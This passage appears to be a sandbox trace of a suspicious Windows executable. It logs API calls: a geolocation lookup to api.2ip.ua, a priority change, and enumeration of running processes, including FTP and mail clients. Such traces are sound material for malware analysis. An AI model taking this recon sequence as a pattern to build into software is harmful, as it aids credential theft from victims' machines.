dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x280da8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_flags=3", lpUsedDefaultChar=0x0) returned 24 [0085.964] GetLastError () returned 0x0 [0085.964] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x280d10) returned 0x90 [0085.964] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280d10, Size=0x94) returned 0x280dc8 [0085.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0085.964] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x46) returned 0x276e28 [0085.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x276e28, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", lpUsedDefaultChar=0x0) returned 70 [0085.964] GetLastError () returned 0x0 [0085.964] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x280dc8) returned 0x94 [0085.964] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280dc8, Size=0x98) returned 0x280dc8 [0085.964] GetLastError () returned 0x0 [0086.052] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x281ed0) returned 0x80 [0086.052] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x281ed0) returned 0x80 [0086.053] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x281ed0) returned 0x80 [0086.062] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x8ec) returned 0x281fe8 [0086.115] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x281ed0) returned 0x80 [0086.115] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x10) returned 0x27e930 [0086.115] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x281ed0) returned 0x80 [0086.116] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x281ed0) returned 0x80 [0086.116] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x281ed0) returned 0x80 [0086.173] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x281ed0) returned 0x80 [0086.183] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0090.125] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x275cf8 [0090.125] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="https://api.2ip.ua/geo.json", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0154.923] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x18ace0, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x18d4e0 | out: lpBuffer=0x18ace0*, lpdwNumberOfBytesRead=0x18d4e0*=0x1d0) returned 1 [0154.926] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0154.931] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0154.949] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x28d958 [0154.958] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1e0) returned 0x2bbd30 [0154.977] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2bbd30 | out: hHeap=0x260000) returned 1 [0154.993] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x28d958 | out: hHeap=0x260000) returned 1 [0154.993] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x275cf8 | out: hHeap=0x260000) returned 1 [0155.010] GetCurrentProcess () returned 0xffffffff [0155.010] GetLastError () returned 0x2 [0155.010] SetPriorityClass (hProcess=0xffffffff, dwPriorityClass=0x80) returned 1 [0155.027] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x10) returned 0x2ae0f8 [0155.037] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x8ec) returned 0x32462e0 [0155.045] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x800) returned 0x323daa8 [0155.046] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x323daa8, nSize=0x400 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cusersabdoappdatalocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75fceb.tmp.exe")) returned 0x6c [0155.046] PathRemoveFileSpecW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0155.054] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x810) returned 0x323e2b0 [0155.054] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe\" " [0155.054] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe\" ", pNumArgs=0x18d5c0 | out: pNumArgs=0x18d5c0) returned 0x3250ea8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe" [0155.055] lstrcpyW (in: lpString1=0x18e250, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe" [0155.072] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe\" " [0155.072] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe\" ", pNumArgs=0x18d55c | out: pNumArgs=0x18d55c) returned 0x3250ea8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe" [0155.072] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe") returned="CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe" [0155.072] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0155.074] GetProcAddress (hModule=0x76d30000, lpProcName="EnumProcesses") returned 0x0 [0155.074] GetProcAddress (hModule=0x76d30000, lpProcName="EnumProcessModules") returned 0x0 [0155.075] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleBaseNameW") returned 0x0 [0155.075] LoadLibraryW (lpLibFileName="Psapi.dll") returned 0x77060000 [0155.145] GetProcAddress (hModule=0x77060000, lpProcName="EnumProcesses") returned 0x77061544 [0155.145] GetProcAddress (hModule=0x77060000, lpProcName="EnumProcessModules") returned 0x77061408 [0155.145] GetProcAddress (hModule=0x77060000, lpProcName="GetModuleBaseNameW") returned 0x7706152c [0155.145] EnumProcesses (in: lpidProcess=0x182d58, cb=0xa000, lpcbNeeded=0x18d568 | out: lpidProcess=0x182d58, lpcbNeeded=0x18d568) returned 1 [0155.161] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0155.161] CloseHandle (hObject=0x0) returned 0 [0155.161] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0155.162] CloseHandle (hObject=0x0) returned 0 [0155.162] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0155.162] CloseHandle (hObject=0x0) returned 0 [0155.162] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0155.162] CloseHandle (hObject=0x0) returned 0 [0155.162] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0155.162] CloseHandle (hObject=0x0) returned 0 [0155.162] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0155.162] CloseHandle (hObject=0x0) returned 0 [0155.162] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0155.162] CloseHandle (hObject=0x0) returned 0 [0155.163] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0155.163] CloseHandle (hObject=0x0) returned 0 [0155.163] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0155.163] CloseHandle (hObject=0x0) returned 0 [0155.163] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0155.163] CloseHandle (hObject=0x0) returned 0 [0155.163] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x250) returned 0x0 [0155.163] CloseHandle (hObject=0x0) returned 0 [0155.163] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0155.163] CloseHandle (hObject=0x0) returned 0 [0155.163] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0155.164] CloseHandle (hObject=0x0) returned 0 [0155.164] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x338) returned 0x0 [0155.164] CloseHandle (hObject=0x0) returned 0 [0155.164] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x370) returned 0x0 [0155.164] CloseHandle (hObject=0x0) returned 0 [0155.164] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0155.164] CloseHandle (hObject=0x0) returned 0 [0155.164] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc8) returned 0x0 [0155.164] CloseHandle (hObject=0x0) returned 0 [0155.164] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x11c) returned 0x0 [0155.164] CloseHandle (hObject=0x0) returned 0 [0155.165] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x444) returned 0x5c0 [0155.165] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 0 [0155.165] CloseHandle (hObject=0x5c0) returned 1 [0155.165] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x454) returned 0x5c0 [0155.165] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 0 [0155.166] CloseHandle (hObject=0x5c0) returned 1 [0155.166] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x47c) returned 0x0 [0155.166] CloseHandle (hObject=0x0) returned 0 [0155.166] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4bc) returned 0x0 [0155.166] CloseHandle (hObject=0x0) returned 0 [0155.166] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5c0 [0155.166] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 0 [0155.166] CloseHandle (hObject=0x5c0) returned 1 [0155.166] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x588) returned 0x5c0 [0155.166] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 0 [0155.167] CloseHandle (hObject=0x5c0) returned 1 [0155.167] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x670) returned 0x5c0 [0155.167] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.169] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xeb0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="red-shadows-rotary.exe") returned 0x16 [0155.170] CloseHandle (hObject=0x5c0) returned 1 [0155.170] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x32c) returned 0x5c0 [0155.170] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.172] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x900000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="eagle warm.exe") returned 0xe [0155.173] CloseHandle (hObject=0x5c0) returned 1 [0155.173] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6a4) returned 0x5c0 [0155.173] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.175] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x3b0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="mph-closes-case.exe") returned 0x13 [0155.176] CloseHandle (hObject=0x5c0) returned 1 [0155.176] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x730) returned 0x5c0 [0155.176] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.178] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xa80000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="attorney-device-baghdad.exe") returned 0x1b [0155.179] CloseHandle (hObject=0x5c0) returned 1 [0155.179] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x78c) returned 0x5c0 [0155.179] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.181] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x800000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="pack implies.exe") returned 0x10 [0155.181] CloseHandle (hObject=0x5c0) returned 1 [0155.181] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x60c) returned 0x5c0 [0155.181] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.183] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xea0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="sierra promotion.exe") returned 0x14 [0155.183] CloseHandle (hObject=0x5c0) returned 1 [0155.183] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x20c) returned 0x5c0 [0155.183] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.185] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x2b0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="border_bandwidth.exe") returned 0x14 [0155.187] CloseHandle (hObject=0x5c0) returned 1 [0155.187] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x244) returned 0x5c0 [0155.187] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.189] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1210000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="releases.exe") returned 0xc [0155.189] CloseHandle (hObject=0x5c0) returned 1 [0155.189] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7a0) returned 0x5c0 [0155.190] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.191] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x2f0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="murray_indicate.exe") returned 0x13 [0155.192] CloseHandle (hObject=0x5c0) returned 1 [0155.192] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x174) returned 0x5c0 [0155.192] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.194] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xef0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="scientific_baltimore_enter.exe") returned 0x1e [0155.194] CloseHandle (hObject=0x5c0) returned 1 [0155.194] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x788) returned 0x5c0 [0155.194] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.197] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x9b0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="brands-shoes.exe") returned 0x10 [0155.197] CloseHandle (hObject=0x5c0) returned 1 [0155.197] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7e8) returned 0x5c0 [0155.197] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.199] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xd60000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="interstate-exposed.exe") returned 0x16 [0155.200] CloseHandle (hObject=0x5c0) returned 1 [0155.200] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x48c) returned 0x5c0 [0155.200] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.202] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1190000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="quarterlyclone.exe") returned 0x12 [0155.203] CloseHandle (hObject=0x5c0) returned 1 [0155.203] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x304) returned 0x5c0 [0155.203] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.205] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x9d0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="remained-hostels-irish.exe") returned 0x1a [0155.206] CloseHandle (hObject=0x5c0) returned 1 [0155.206] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x544) returned 0x5c0 [0155.206] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.208] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1040000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="providing-icon.exe") returned 0x12 [0155.208] CloseHandle (hObject=0x5c0) returned 1 [0155.208] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x774) returned 0x5c0 [0155.208] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.210] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x30000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="findlaw_northeast_generally.exe") returned 0x1f [0155.210] CloseHandle (hObject=0x5c0) returned 1 [0155.210] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7ec) returned 0x5c0 [0155.211] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.212] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x230000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="rise_waiver.exe") returned 0xf [0155.212] CloseHandle (hObject=0x5c0) returned 1 [0155.213] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7dc) returned 0x5c0 [0155.213] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.214] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1370000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="3dftp.exe") returned 0x9 [0155.215] CloseHandle (hObject=0x5c0) returned 1 [0155.215] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5c4) returned 0x5c0 [0155.215] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.217] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x2f0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="absolutetelnet.exe") returned 0x12 [0155.218] CloseHandle (hObject=0x5c0) returned 1 [0155.218] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5b8) returned 0x5c0 [0155.218] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.220] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x11d0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="alftp.exe") returned 0x9 [0155.220] CloseHandle (hObject=0x5c0) returned 1 [0155.220] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x704) returned 0x5c0 [0155.220] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.222] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xdf0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="barca.exe") returned 0x9 [0155.223] CloseHandle (hObject=0x5c0) returned 1 [0155.223] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x694) returned 0x5c0 [0155.223] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.224] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x8e0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="bitkinex.exe") returned 0xc [0155.225] CloseHandle (hObject=0x5c0) returned 1 [0155.225] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x754) returned 0x5c0 [0155.225] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.226] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xb80000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="coreftp.exe") returned 0xb [0155.227] CloseHandle (hObject=0x5c0) returned 1 [0155.227] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x124) returned 0x5c0 [0155.227] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.228] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1e0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="far.exe") returned 0x7 [0155.229] CloseHandle (hObject=0x5c0) returned 1 [0155.229] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x40c) returned 0x5c0 [0155.229] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.231] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xa70000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="filezilla.exe") returned 0xd [0155.231] CloseHandle (hObject=0x5c0) returned 1 [0155.231] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc4) returned 0x5c0 [0155.231] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.233] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xd90000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="flashfxp.exe") returned 0xc [0155.233] CloseHandle (hObject=0x5c0) returned 1 [0155.233] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x53c) returned 0x5c0 [0155.233] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.235] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xa0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="fling.exe") returned 0x9 [0155.236] CloseHandle (hObject=0x5c0) returned 1 [0155.236] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x79c) returned 0x5c0 [0155.236] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.238] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x800000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="foxmailincmail.exe") returned 0x12 [0155.238] CloseHandle (hObject=0x5c0) returned 1 [0155.238] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x798) returned 0x5c0 [0155.238] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.241] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xc00000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="gmailnotifierpro.exe") returned 0x14 [0155.241] CloseHandle (hObject=0x5c0) returned 1 [0155.241] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5c0 [0155.241] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.244] GetModuleBaseNameW (in: hProcess=0x5c0, 